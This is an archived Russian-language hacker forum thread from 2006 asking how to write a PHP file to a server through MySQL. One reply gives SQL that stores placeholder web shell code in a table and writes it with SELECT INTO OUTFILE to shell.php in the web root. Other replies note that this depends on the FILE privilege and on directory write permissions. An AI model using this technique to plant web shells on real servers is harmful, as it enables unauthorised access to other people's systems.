Просмотр полной версии : php через MySQL
Как можно залить php файл через MySQL?
Юзаю rst.void sql скрипт...
fucker"ok
16.01.2006, 16:43
смотря какие права у тебя есть.
Например
//Создаём таблицу shell
CREATE TABLE shell (code TEXT NULL);
//вставляем в неё сам код шела
INSERT INTO shell VALUES('<? shell(); ?>');
//выводим шел в файл
SELECT * FROM shell INTO OUTFILE '/home/PATH_TO_WWW/shell.php';
но не факт. Это тоже от много зависит.
прежде всего зависит от того есть ли привилегия file у юзера sql .
если нет то получишь сообщение об ошибке типо аксес денайд фор юзер....и т.п
Zadoxlik
17.01.2006, 16:49
Попасть в админку и там поковырять или так как уже тут сказали.
fucker"ok
17.01.2006, 16:54
Я не знаю можно ли запретить OUTFILE для самого mysql, но mysql запущен от юзера mysql (покрайне мерее я так делаю, так рекомендует документация). Так что чтобы записать твой пхп код мало знать путь до WWW, нужно ещё иметь папочку с правами на запись для левых юзеров :]
конечно можно. админ мискл может запретить любые команды, даже SELECT)))
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot